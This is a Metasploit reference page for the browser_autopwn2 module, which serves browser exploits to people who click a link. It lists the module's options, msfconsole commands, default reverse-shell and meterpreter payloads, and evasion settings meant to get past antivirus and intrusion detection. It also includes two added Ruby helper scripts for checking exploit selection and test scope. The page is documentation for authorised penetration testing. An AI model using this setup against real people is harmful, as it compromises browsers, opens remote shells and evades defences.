HTTP Client Automatic Exploiter 2 (Browser Autopwn) - Metasploit


This page contains detailed information about how to use the auxiliary/server/browser_autopwn2 metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
Source code: modules/auxiliary/server/browser_autopwn2.rb
Disclosure date: 2015-07-05
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will automatically serve browser exploits. Here are the options you can configure:

  • INCLUDE_PATTERN allows you to specify the kind of exploits to be loaded. For example, if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'.
  • EXCLUDE_PATTERN will ignore exploits. For example, if you don't want any Adobe Flash exploits, you can set this. Also note that the Exclude option will always be evaluated after the Include option.
  • MaxExploitCount specifies the max number of exploits to load by Browser Autopwn. By default, 20 will be loaded. But note that the client will probably not be vulnerable to all 20 of them, so only some will actually be served to the client.
  • HTMLContent allows you to provide a basic webpage. This is what the user behind the vulnerable browser will see. You can simply set a string, or you can use the file:// syntax to load an HTML file. Note this option might break exploits, so try to keep it as simple as possible.
  • MaxSessionCount is used to limit how many sessions Browser Autopwn is allowed to get. The default -1 means unlimited. Combining this with other options such as RealList and Custom404, you can get information about which visitors (IPs) clicked on your malicious link and what exploits they might be vulnerable to, and redirect them to your own internal training website without actually attacking them.

For more information about Browser Autopwn, please see the referenced blog post.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > exploit

Knowledge Base


Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and feel different for you. Here are the features you should know about before using.

Vulnerable Application


Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

  • Internet Explorer
  • Mozilla Firefox
  • Adobe Flash
  • Java
  • ActiveX
  • Silverlight

Exploit URLs


Normally, the only URL you need to care about is the BrowserAutoPwn URL. This is the URL you should send to the targets you wish to attack.

For debugging purposes, you can also see each browser exploit's specific URL path. You can do so by setting the VERBOSE option to true in msfconsole, like this:

set VERBOSE true

And then when you run the module, there will be a list showing all the exploits that might be used, including the URLs.

Browser Autopwn 2 Options


The HTMLContent Option

The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a blank one. It supports two syntaxes.

This example will basically print "Hello world!" on the browser while exploits are tested against it.

set HTMLContent Hello world!  

set HTMLContent file:///tmp/hello_world.html

This example will load the file /tmp/hello_world.html, and that's what the browser will see. Most likely the second (file://) syntax is how you'd want to use the HTMLContent option.

Keep in mind that you should probably try to keep HTMLContent as simple as possible, otherwise there is a possibility that it might actually influence the reliability of the exploits, especially the ones that do memory corruption.

The EXCLUDE_PATTERN option

The EXCLUDE_PATTERN option is used for excluding exploit file names you don't want Browser Autopwn 2 to use. This is a regex type option, so you can be creative about it.

For example, Adobe Flash exploits in Metasploit tend to have file names that begin with "adobe_flash_", so to exclude those, you can do:

set EXCLUDE_PATTERN adobe_flash  

The INCLUDE_PATTERN option

The INCLUDE_PATTERN option is for loading only the specific exploits that you want Browser Autopwn 2 to use. Reusing the Adobe Flash file name example, if you only want Flash exploits, you can do:

set INCLUDE_PATTERN adobe_flash  

If you set both INCLUDE_PATTERN and EXCLUDE_PATTERN, the evaluation for INCLUDE_PATTERN will kick in first, followed by EXCLUDE_PATTERN.

The MaxExploitCount option

The MaxExploitCount option is for specifying how many exploits you want Browser Autopwn 2 to load. By default, it's 21, but you can bump it up a little if you wish to try more exploits. Note that by doing so you are also allowing more lower-ranking modules to kick in, so you will have to find the sweet spot yourself. An example of setting it:

set MaxExploitCount 30 
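The three options above (INCLUDE_PATTERN, EXCLUDE_PATTERN and MaxExploitCount) interact in a fixed order: include first, exclude second, then the cap. The following Ruby script is an added example, not the module's own code; it models that order on a constructed list of exploit file names and ranks so you can see what a given combination of settings would leave loaded. The sample names and ranks are made up, and sorting the survivors by rank before applying the cap is an assumption drawn from the note that a higher MaxExploitCount lets lower-ranking modules in.

```ruby
# Added example (not Browser Autopwn 2's code): a model of the documented
# exploit selection order.
#   1. INCLUDE_PATTERN (regex) keeps only matching exploit file names
#   2. EXCLUDE_PATTERN (regex) then drops matches from what is left
#   3. survivors are ordered by rank and cut at MaxExploitCount (assumed)

RANKS = { 'excellent' => 600, 'great' => 500, 'good' => 400,
          'normal' => 300, 'average' => 200, 'low' => 100 }.freeze

# Constructed sample inventory: [exploit file name, rank]
SAMPLE_EXPLOITS = [
  ['adobe_flash_hacking_team_uaf', 'great'],
  ['adobe_flash_pixel_bender_bof', 'excellent'],
  ['adobe_flash_net_connection_confusion', 'normal'],
  ['firefox_proto_crmfrequest', 'excellent'],
  ['ms13_037_svg_dashstyle', 'good'],
  ['java_jre17_jmxbean', 'excellent'],
  ['ie_cgenericelement_uaf', 'normal'],
].freeze

# Returns the exploit names that would be loaded under the given settings.
def select_exploits(exploits, include_pattern: nil, exclude_pattern: nil, max_count: 21)
  selected = exploits

  # Step 1: INCLUDE_PATTERN is evaluated first
  if include_pattern && !include_pattern.empty?
    inc = Regexp.new(include_pattern)
    selected = selected.select { |name, _| name =~ inc }
  end

  # Step 2: EXCLUDE_PATTERN always runs after INCLUDE_PATTERN, so a name
  # matched by both is dropped
  if exclude_pattern && !exclude_pattern.empty?
    exc = Regexp.new(exclude_pattern)
    selected = selected.reject { |name, _| name =~ exc }
  end

  # Step 3: highest rank first (name as tie-break), then cap at MaxExploitCount
  selected.sort_by { |name, rank| [-RANKS.fetch(rank), name] }
          .first(max_count)
          .map(&:first)
end

if __FILE__ == $PROGRAM_NAME
  puts 'INCLUDE_PATTERN adobe_flash:'
  puts select_exploits(SAMPLE_EXPLOITS, include_pattern: 'adobe_flash')
  puts 'EXCLUDE_PATTERN adobe_flash, MaxExploitCount 2:'
  puts select_exploits(SAMPLE_EXPLOITS, exclude_pattern: 'adobe_flash', max_count: 2)
end
```

Because exclusion runs last, setting both patterns to the same value loads nothing at all; a quick dry run of the model with your intended patterns before launching a test avoids that surprise.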

The MaxSessionCount option

The MaxSessionCount option is for limiting how many sessions to get. It may sound a little odd at first, because why would you want to do that? A use case is when you don't actually want to pop shells and instead just want to know which exploits could be used. You can also use it if you don't want your attack to stay open the whole time:

set MaxSessionCount 10  

The ShowExploitList option

The ShowExploitList option displays the list of exploits specific to each browser/client. As explained before, when BAP2 loads 21 exploits, probably not all 21 will be served to the browser, only some of them. To see which ones, set this option:

set ShowExploitList true

The AllowedAddresses option

The AllowedAddresses option is for attacking only a specific range of IPs, as a way to avoid penetration testing accidents. For example, when you send a malicious link to a specific person, that person may share it with friends, family or other people, and those people aren't your targets, so you shouldn't hit them. Browser Autopwn doesn't know that, so one of the ways to avoid it is to create a whitelist.

The option also supports two syntaxes. This is most likely how you will set it:

set AllowedAddresses file:///tmp/ip_list.txt  

The above will load the file ip_list.txt, which contains one IP per line.
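Since the whole point of AllowedAddresses is to keep the test inside the agreed scope, it is worth checking the list file before loading it. The Ruby script below is an added example, not part of the module: it parses a constructed ip_list.txt (one IP per line) and reports any line that is not a valid address or that falls outside the engagement's authorised networks. The sample addresses and scope CIDRs are made up; whether the module itself tolerates blank or comment lines in the file is not documented here, so this checker skips them as an assumption.

```ruby
require 'ipaddr'

# Constructed sample file contents in the AllowedAddresses file:// format
# (one IP per line). Blank lines and '#' comments are skipped by this
# checker; the module's own parser may not accept them (assumption).
SAMPLE_IP_LIST = <<~LIST
  # engagement targets (constructed sample)
  192.0.2.10
  192.0.2.11

  198.51.100.7
  not-an-ip
  203.0.113.9
LIST

# Authorised scope for the engagement (constructed sample CIDRs)
SAMPLE_SCOPE = ['192.0.2.0/24', '198.51.100.0/24'].freeze

# Parse the list into valid IPAddr objects and the raw lines that failed.
def parse_ip_list(text)
  valid = []
  rejected = []
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    begin
      valid << IPAddr.new(line)
    rescue IPAddr::InvalidAddressError
      rejected << line
    end
  end
  [valid, rejected]
end

# Return (as strings) the addresses that are not inside any scope network.
def out_of_scope(addresses, scope_cidrs)
  nets = scope_cidrs.map { |cidr| IPAddr.new(cidr) }
  addresses.reject { |ip| nets.any? { |net| net.include?(ip) } }.map(&:to_s)
end

# True only if every line parsed and every address is inside the scope.
def allowed_addresses_ok?(text, scope_cidrs)
  valid, rejected = parse_ip_list(text)
  rejected.empty? && out_of_scope(valid, scope_cidrs).empty?
end

if __FILE__ == $PROGRAM_NAME
  valid, rejected = parse_ip_list(SAMPLE_IP_LIST)
  puts "unparseable lines: #{rejected.inspect}"
  puts "out of scope:      #{out_of_scope(valid, SAMPLE_SCOPE).inspect}"
  puts "safe to load:      #{allowed_addresses_ok?(SAMPLE_IP_LIST, SAMPLE_SCOPE)}"
end
```

Run it against the real list and the scope from the rules of engagement before you `set AllowedAddresses file:///...`; a single out-of-scope entry should stop the test until the file is corrected.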

The ExploitReloadTimeout option

The ExploitReloadTimeout option sets how long BAP2 should wait before loading the next exploit. By default, it's 3 seconds, but if some exploits need more time (for example, to groom the heap, load other things, or sleep somewhere), you will need to raise it. In most cases, you shouldn't have to.

Here's an example of setting it to 5 seconds:

set ExploitReloadTimeout 5000

Scenarios


By default, Browser Autopwn 2 goes through the entire exploit module tree and will try to use different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to test a specific application, basically all you need to do is set the INCLUDE_PATTERN option (or maybe EXCLUDE_PATTERN).

However, there is another trick to make this task even easier. BAP2 also comes with the following resource scripts that can automatically do this:

  • bap_firefox_only.rc - For testing Firefox
  • bap_flash_only.rc - For testing Adobe Flash
  • bap_ie_only.rc - For testing Internet Explorer
  • bap_dryrun_only.rc - Rickrolls the target, and shows you all the suitable exploits against that target. No exploits will actually be fired.

Here's an example of using bap_flash_only.rc to test Adobe Flash vulnerabilities:

$ ./msfconsole -q -r scripts/resource/bap_flash_only.rc   

Logging


When a browser connects to BAP, this link-clicking event is logged to the database as a "bap.clicks" note type. If the ShowExploitList option is set to true, the exploit list information is saved as well, so that after testing you can go back to the database and see which users are vulnerable to which exploits.

Even if you don't set the ShowExploitList option, the logged link-clicking event data is more than enough to prove that the user was social-engineered, which is still a security risk.

To see all the bap.clicks events, in msfconsole do:

notes -t bap.clicks

From there, you can do additional analysis of these notes, put it on your report, and hopefully do something about it.


Msfconsole Usage


Here is how the server/browser_autopwn2 auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/browser_autopwn2

msf6 auxiliary(server/browser_autopwn2) > show info

       Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
     Module: auxiliary/server/browser_autopwn2
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-07-05

Provided by:
  sinn3r <[email protected]>

Available actions:
  Name       Description
  ----       -----------
  WebServer  Start a bunch of modules and direct clients to appropriate exploits

Check supported:
  No

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
  INCLUDE_PATTERN                   no        Pattern search to include specific modules
  Retries          true             no        Allow the browser to retry the module
  SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT          8080             yes       The local port to listen on.
  SSL              false            no        Negotiate SSL for incoming connections
  SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                           no        The URI to use for this exploit (default is random)

Description:
  This module will automatically serve browser exploits. Here are the 
  options you can configure: The INCLUDE_PATTERN option allows you to 
  specify the kind of exploits to be loaded. For example, if you wish 
  to load just Adobe Flash exploits, then you can set Include to 
  'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For 
  example, if you don't want any Adobe Flash exploits, you can set 
  this. Also note that the Exclude option will always be evaluated 
  after the Include option. The MaxExploitCount option specifies the 
  max number of exploits to load by Browser Autopwn. By default, 20 
  will be loaded. But note that the client will probably not be 
  vulnerable to all 20 of them, so only some will actually be served 
  to the client. The HTMLContent option allows you to provide a basic 
  webpage. This is what the user behind the vulnerable browser will 
  see. You can simply set a string, or you can do the file:// syntax 
  to load an HTML file. Note this option might break exploits so try 
  to keep it as simple as possible. The MaxSessionCount option is used 
  to limit how many sessions Browser Autopwn is allowed to get. The 
  default -1 means unlimited. Combining this with other options such 
  as RealList and Custom404, you can get information about which 
  visitors (IPs) clicked on your malicious link, what exploits they 
  might be vulnerable to, redirect them to your own internal training 
  website without actually attacking them. For more information about 
  Browser Autopwn, please see the referenced blog post.

References:
  https://blog.rapid7.com/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2

Module Options


This is a complete list of options available in the server/browser_autopwn2 auxiliary module:

msf6 auxiliary(server/browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
   INCLUDE_PATTERN                   no        Pattern search to include specific modules
   Retries          true             no        Allow the browser to retry the module
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

Advanced Options


Here is a complete list of advanced options supported by the server/browser_autopwn2 auxiliary module:

msf6 auxiliary(server/browser_autopwn2) > show advanced

Module advanced options (auxiliary/server/browser_autopwn2):

   Name                   Current Setting                    Required  Description
   ----                   ---------------                    --------  -----------
   AllowedAddresses                                          no        A range of IPs you're interested in attacking
   CookieExpiration                                          no        Cookie expiration in years (blank=expire on exit)
   CookieName             __ua                               no        The name of the tracking cookie
   Custom404                                                 no        An external custom 404 URL (Example: http://example.com/404.html)
   ExploitReloadTimeout   3000                               no        Number of milliseconds before trying the next exploit
   HTMLContent                                               no        HTML Content
   JsIdentifiers                                             no        Identifiers to preserve for JsObfu
   JsObfuscate            0                                  no        Number of times to obfuscate JavaScript
   LHOST                  192.168.204.3                      yes       The local host for the exploits and handlers
   ListenerComm                                              no        The specific communication channel to use for this service
   MaxExploitCount        21                                 no        Number of browser exploits to load
   MaxSessionCount        -1                                 no        Number of sessions to get
   PAYLOAD_ANDROID        android/meterpreter/reverse_tcp    yes       Payload for android browser exploits
   PAYLOAD_ANDROID_LPORT  4443                               yes       Payload LPORT for android browser exploits
   PAYLOAD_FIREFOX        firefox/shell_reverse_tcp          yes       Payload for firefox browser exploits
   PAYLOAD_FIREFOX_LPORT  4442                               yes       Payload LPORT for firefox browser exploits
   PAYLOAD_GENERIC        generic/shell_reverse_tcp          yes       Payload for generic browser exploits
   PAYLOAD_GENERIC_LPORT  4459                               yes       Payload LPORT for generic browser exploits
   PAYLOAD_JAVA           java/meterpreter/reverse_tcp       yes       Payload for java browser exploits
   PAYLOAD_JAVA_LPORT     4448                               yes       Payload LPORT for java browser exploits
   PAYLOAD_LINUX          linux/x86/meterpreter/reverse_tcp  yes       Payload for linux browser exploits
   PAYLOAD_LINUX_LPORT    4445                               yes       Payload LPORT for linux browser exploits
   PAYLOAD_OSX            osx/x86/shell_reverse_tcp          yes       Payload for osx browser exploits
   PAYLOAD_OSX_LPORT      4447                               yes       Payload LPORT for osx browser exploits
   PAYLOAD_UNIX           cmd/unix/reverse                   yes       Payload for unix browser exploits
   PAYLOAD_UNIX_LPORT     4446                               yes       Payload LPORT for unix browser exploits
   PAYLOAD_WIN            windows/meterpreter/reverse_tcp    yes       Payload for win browser exploits
   PAYLOAD_WIN_LPORT      4444                               yes       Payload LPORT for win browser exploits
   SSLCipher                                                 no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression         false                              no        Enable SSL/TLS-level compression
   SendRobots             false                              no        Return a robots.txt file if asked for one
   ShowExploitList        false                              yes       Show which exploits will actually be served to each client
   URIHOST                                                   no        Host to use in URI (useful for tunnels)
   URIPORT                                                   no        Port to use in URI (useful for tunnels)
   VERBOSE                false                              no        Enable detailed status messages
   WORKSPACE                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the server/browser_autopwn2 module can do:

msf6 auxiliary(server/browser_autopwn2) > show actions

Auxiliary actions:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

Evasion Options


Here is the full list of possible evasion options supported by the server/browser_autopwn2 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(server/browser_autopwn2) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)


Authors


  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
